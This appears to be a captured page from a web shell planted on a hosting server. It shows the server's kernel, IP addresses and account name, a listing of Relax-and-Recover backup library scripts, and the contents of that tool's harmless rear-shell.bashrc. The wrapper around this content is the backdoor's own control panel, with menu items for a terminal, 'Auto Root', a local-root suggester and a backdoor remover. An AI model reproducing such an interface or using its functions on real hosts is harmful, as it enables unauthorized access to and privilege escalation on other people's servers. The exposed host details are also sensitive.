Linux ih01.iridiumhosting.com 5.14.0-611.5.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 08:09:09 EST 2025 x86_64
LiteSpeed
Server IP : 67.227.241.211 & Your IP : 216.73.216.226
Domains :
Cant Read [ /etc/named.conf ]
User : dustinhy
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
MXB /
rear /
usr /
share /
rear /
lib /
Delete
Unzip
Name
Size
Permission
Date
Action
validated
[ DIR ]
drwxr-xr-x
2026-04-01 09:39
_framework-setup-and-functions.sh
111.2
KB
-rw-r--r--
2026-04-01 09:39
array-functions.sh
1.08
KB
-rw-r--r--
2026-04-01 09:39
authtoken-functions.sh
16.84
KB
-rw-r--r--
2026-04-01 09:39
bareos-functions.sh
10.3
KB
-rw-r--r--
2026-04-01 09:39
bootloader-functions.sh
43.74
KB
-rw-r--r--
2026-04-01 09:39
borg-functions.sh
6.9
KB
-rw-r--r--
2026-04-01 09:39
checkintegrity-workflow.sh
385
B
-rw-r--r--
2026-04-01 09:39
checklayout-workflow.sh
646
B
-rw-r--r--
2026-04-01 09:39
columns-functions.sh
2.95
KB
-rw-r--r--
2026-04-01 09:39
config-functions.sh
7.88
KB
-rw-r--r--
2026-04-01 09:39
cove-functions.sh
2.61
KB
-rw-r--r--
2026-04-01 09:39
drlm-functions.sh
2.6
KB
-rw-r--r--
2026-04-01 09:39
dump-workflow.sh
7.63
KB
-rw-r--r--
2026-04-01 09:39
filesystems-functions.sh
12.08
KB
-rw-r--r--
2026-04-01 09:39
finalizeonly-workflow.sh
1.22
KB
-rw-r--r--
2026-04-01 09:39
format-workflow.sh
3.79
KB
-rw-r--r--
2026-04-01 09:39
global-functions.sh
49.92
KB
-rw-r--r--
2026-04-01 09:39
help-workflow.sh
3.6
KB
-rw-r--r--
2026-04-01 09:39
hp_raid-functions.sh
871
B
-rw-r--r--
2026-04-01 09:39
layout-functions.sh
64.96
KB
-rw-r--r--
2026-04-01 09:39
layoutonly-workflow.sh
803
B
-rw-r--r--
2026-04-01 09:39
linux-functions.sh
14.6
KB
-rw-r--r--
2026-04-01 09:39
mail-functions.sh
1.39
KB
-rw-r--r--
2026-04-01 09:39
mkbackup-workflow.sh
585
B
-rw-r--r--
2026-04-01 09:39
mkbackuponly-workflow.sh
368
B
-rw-r--r--
2026-04-01 09:39
mkboot-workflow.sh
1.13
KB
-rw-r--r--
2026-04-01 09:39
mkopalpba-workflow.sh
890
B
-rw-r--r--
2026-04-01 09:39
mkrescue-functions.sh
5.72
KB
-rw-r--r--
2026-04-01 09:39
mkrescue-workflow.sh
461
B
-rw-r--r--
2026-04-01 09:39
mksystemstate-workflow.sh
539
B
-rw-r--r--
2026-04-01 09:39
mountonly-workflow.sh
1.7
KB
-rw-r--r--
2026-04-01 09:39
network-functions.sh
8.53
KB
-rw-r--r--
2026-04-01 09:39
opal-functions.sh
15.67
KB
-rw-r--r--
2026-04-01 09:39
opaladmin-workflow.sh
18.37
KB
-rw-r--r--
2026-04-01 09:39
output-functions.sh
3.17
KB
-rw-r--r--
2026-04-01 09:39
progresssubsystem.nosh
2.32
KB
-rw-r--r--
2026-04-01 09:39
rear-shell.bashrc
2.68
KB
-rw-r--r--
2026-04-01 09:39
recover-workflow.sh
1.59
KB
-rw-r--r--
2026-04-01 09:39
restoreonly-workflow.sh
832
B
-rw-r--r--
2026-04-01 09:39
rsync-functions.sh
4.56
KB
-rw-r--r--
2026-04-01 09:39
savelayout-workflow.sh
643
B
-rw-r--r--
2026-04-01 09:39
serial-functions.sh
3.98
KB
-rw-r--r--
2026-04-01 09:39
sesam-functions.sh
1.18
KB
-rw-r--r--
2026-04-01 09:39
shell-workflow.sh
648
B
-rw-r--r--
2026-04-01 09:39
tpmpwd-functions.sh
625
B
-rw-r--r--
2026-04-01 09:39
udev-workflow.sh
3.27
KB
-rw-r--r--
2026-04-01 09:39
uefi-functions.sh
9.69
KB
-rw-r--r--
2026-04-01 09:39
validate-workflow.sh
4.91
KB
-rw-r--r--
2026-04-01 09:39
write-protect-functions.sh
7.75
KB
-rw-r--r--
2026-04-01 09:39
Save
Rename
PS1="REAR \h:\w # " alias dir='ls -l' alias ll='ls -l' alias la='ls -la' alias l='ls -alF' alias ls-l='ls -l' alias md='mkdir -p' alias which='type -p' alias rehash='hash -r' # ReaR helpers function show { declare -p $(compgen -v | grep -iF "${1:-_}") } # mandatory for our scripts to work shopt -s nullglob extglob eval "$REAR_EVAL" &>/dev/null unset REAR_EVAL # reduce environmental pollution VERBOSE=1 # source Relax-and-Recover functions for script in $SHARE_DIR/lib/*functions.sh ; do source $script ; done source $SHARE_DIR/lib/progresssubsystem.nosh # Set EXIT_FAIL_MESSAGE to 0 to avoid a false exit failure message from the exit task # "(( EXIT_FAIL_MESSAGE )) && echo '${MESSAGE_PREFIX}$PROGRAM $WORKFLOW failed, check $RUNTIME_LOGFILE for details' 1>&8" # that is set in lib/_framework-setup-and-functions.sh which is sourced above for this shell here. # Because we have two shells where ReaR's exit tasks are set (both via lib/_framework-setup-and-functions.sh) # exiting this bash here runs ReaR's exit tasks and then this workflow finishes # which lets the outer bash that runs rear finish which also runs ReaR's exit tasks: # # usr/sbin/rear -v shell # ... # REAR localhost:~/usr/share/rear # pstree -Aplau | grep -B2 -A1 bashrc.rear # `-bash,7549 # `-rear,13862 usr/sbin/rear -v shell # `-bash,14076 --rcfile /usr/share/rear/lib/bashrc.rear -i # |-grep,14190 --color=auto -B2 -A1 bashrc.rear # `-pstree,14189 -Aplau # REAR localhost:~/usr/share/rear # exit # exit # Exiting rear shell (PID 14076) and its descendant processes ... # Running exit tasks # Exiting rear shell (PID 13862) and its descendant processes ... # Running exit tasks # Without EXIT_FAIL_MESSAGE=0 that would look like # Exiting rear shell (PID 14076) and its descendant processes ... # Running exit tasks # rear shell failed, check /var/log/rear/rear-localhost.log for details # Exiting rear shell (PID 13862) and its descendant processes ... # Running exit tasks EXIT_FAIL_MESSAGE=0 echo " This is the interactive shell (bash) within $PRODUCT. It is intended for development and testing of $PRODUCT to find out how things behave within the $PRODUCT environment. For example you can call $PRODUCT specific functions or source $PRODUCT scripts to test their behaviour. Helper commands: show <var name fragment> dumps all matching variables Source .../script.sh runs a single ReaR script SourceStage stage/subdir runs an entire stage or a subdir, e.g. verify/PPDM SHARE_DIR=$SHARE_DIR BUILD_DIR=$BUILD_DIR " WORKING_DIR=$SHARE_DIR # ensure that we can run Source ...script.sh via tab completion and that the Source function will stay there cd $SHARE_DIR